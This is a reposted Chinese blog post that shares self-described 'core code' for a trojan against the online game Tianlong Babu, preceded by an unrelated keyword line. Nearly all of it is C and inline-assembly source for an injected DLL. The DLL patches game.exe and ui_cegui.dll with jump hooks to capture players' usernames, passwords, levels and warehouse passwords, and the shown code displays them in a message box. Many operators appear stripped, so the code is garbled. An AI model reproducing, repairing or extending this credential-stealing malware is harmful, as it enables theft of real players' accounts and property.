深圳网站开发兼职,卢松松外链工具,wordpress站所有分类不显示,月流量10g的网站天龙八部***核心代码 信息来源#xff1a;邪恶八进制信息安全团队#xff08;www.eviloctal.com#xff09; 文章作者#xff1a;认真的雪 我也来凑凑热闹..... 发一个网游***核心代码...无聊的时候写的.. 截取了用户名#xff0c;密码#xff0c;等级#xff0c;仓库密… 天龙八部***核心代码 信息来源邪恶八进制信息安全团队www.eviloctal.com 文章作者认真的雪 我也来凑凑热闹..... 发一个网游***核心代码...无聊的时候写的.. 截取了用户名密码等级仓库密码 代码: #include windows.h BYTE userCode[7]{0x8B,0x45,0x0C,0x50,0x8D,0x4B,0x5C}; BYTE userJmpCode[6]{0xe9,0x00,0x00,0x00,0x00,0x90}; BYTE gradeCode[6]{0x89,0x9F,0xFC,0x00,0x00,0x00}; BYTE gradeJmpCode[6]{0xe9,0x00,0x00,0x00,0x00,0x90}; BYTE storeCode[9]{0x8B,0x4E,0x04,0x33,0xC5,0x57,0x8B,0x7D,0x08}; BYTE oldStoreCode[6]{0}; BYTE storeJmpCode[6]{0xe9,0x00,0x00,0x00,0x00,0x90}; DWORD ui_cegui; void *lpUserRetNULL; void *lpGradeRetNULL; void *lpStoreRetNULL; char user[40]; char pass[40]; char storePassWord[40]; DWORD dwGrade; DWORD stroePath0; void _stdcall StroeUnhook(); void _stdcall HookStroe(); DWORD CmpFlag(BYTE *flag,char *moduleName,int len,void **lpRet , DWORD *lpModule) { BYTE *buffNULL; HMODULE hModule::GetModuleHandle(moduleName); if(hModuleNULL) { ::MessageBox(NULL,获取模块错误,failed,0); return 0; } DWORD p_w_picpathSize*(DWORD*)(*(DWORD*)((DWORD)hModule0x3c)(DWORD)hModule0x50); void *newModuleVirtualAlloc( NULL, p_w_picpathSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); *lpModule(DWORD)newModule; memcpy(newModule,(void*)hModule,p_w_picpathSize); for(DWORD i0;ip_w_picpathSize;i) { buff(BYTE*)((DWORD)newModulei); if(memcmp(buff,flag,len)0) { *lpRet(void*)buff; return i(DWORD)hModule; } } return 0; } DWORD GetRealFlag(BYTE *flag,char *moduleName,int len,void **lpRet,DWORD newModule) { BYTE *buffNULL; HMODULE hModule::GetModuleHandle(moduleName); if(hModuleNULL) { ::MessageBox(NULL,获取模块错误,failed,0); return 0; } DWORD p_w_picpathSize*(DWORD*)(*(DWORD*)((DWORD)hModule0x3c)(DWORD)hModule0x50); for(DWORD i0;ip_w_picpathSize;i) { buff(BYTE*)(newModulei); if(memcmp(buff,flag,len)0) { *lpRet(void*)buff; return i(DWORD)hModule; } } return 0; } void _stdcall GetUserBuff(char *userName,char *passWord) { strcpy(user,userName); strcpy(pass,passWord); return; } __declspec(naked)void GetUserAndPass() { _asm { push eax; mov eax,dword ptr ss:[ebp0xC]; push eax; push ecx; call GetUserBuff; call StroeUnhook; pop eax; jmp [lpUserRet]; } } void _stdcall GetGradeDword(DWORD grade) { dwGradegrade; return; } __declspec(naked)void GetGrade() { _asm { pushad; push ebx; call GetGradeDword; call HookStroe; popad; jmp [lpGradeRet]; } } void _stdcall StroeUnhook() { if(stroePath0) return; MEMORY_BASIC_INFORMATION mbi; VirtualProtect((void*)stroePath,7,PAGE_READWRITE,(DWORD*)mbi); memcpy((void*)stroePath,oldStoreCode,6); VirtualProtect((void*)stroePath,7,mbi.Protect,0); return; } void _stdcall GetStoreBuff(char *storePass) { strcpy(storePassWord,storePass); char data[256]; wsprintf(data,用户名%s\n密码%s\n等级%d\n仓库密码%s\n,user,pass,dwGrade,storePassWord); ::MessageBox(NULL,data,ok,0); } __declspec(naked)void GetStore() { _asm { pushad; push ecx; call GetStoreBuff; call StroeUnhook; popad; jmp [lpStoreRet]; } } void _stdcall HookStroe() { stroePathGetRealFlag(storeCode,ui_cegui.dll,9,lpStoreRet,ui_cegui); if(stroePath0) return ; stroePathstroePath0x43; lpStoreRet(void*)((DWORD)lpStoreRet0x43); DWORD jmpAddress(DWORD)GetStore-(stroePath5); *(DWORD*)(storeJmpCode[1])jmpAddress; memcpy(oldStoreCode,(BYTE*)stroePath,6); MEMORY_BASIC_INFORMATION mbi; VirtualProtect((void*)stroePath,7,PAGE_READWRITE,(DWORD*)mbi); memcpy((void*)stroePath,storeJmpCode,6); VirtualProtect((void*)stroePath,7,mbi.Protect,0); return; } void HookGrade() { DWORD passPathCmpFlag(gradeCode,ui_cegui.dll,6,lpGradeRet,ui_cegui); if(passPath0) return ; DWORD jmpAddress(DWORD)GetGrade-(passPath5); *(DWORD*)(gradeJmpCode[1])jmpAddress; MEMORY_BASIC_INFORMATION mbi; VirtualProtect((void*)passPath,7,PAGE_READWRITE,(DWORD*)mbi); memcpy((void*)passPath,gradeJmpCode,6); VirtualProtect((void*)passPath,7,mbi.Protect,0); } void HookUserAndPass() { DWORD hModule; DWORD passPathCmpFlag(userCode,game.exe,7,lpUserRet,hModule); if(passPath0) return ; DWORD jmpAddress(DWORD)GetUserAndPass-(passPath5); *(DWORD*)(userJmpCode[1])jmpAddress; MEMORY_BASIC_INFORMATION mbi; VirtualProtect((void*)passPath,7,PAGE_READWRITE,(DWORD*)mbi); memcpy((void*)passPath,userJmpCode,6); VirtualProtect((void*)passPath,7,mbi.Protect,0); } DWORD WINAPI Thread(LPVOID lpParam) { HookUserAndPass(); HookGrade(); return 0; } BOOL APIENTRY DllMain( HANDLE hModule, DWORD ul_reason_for_call, LPVOID lpReserved ) { switch(ul_reason_for_call) { case DLL_PROCESS_ATTACH: { DWORD ThreadId; CreateThread(NULL,NULL,Thread,NULL,NULL,ThreadId); break; } default:break; } return TRUE; } 转载于:https://blog.51cto.com/4225964/780138
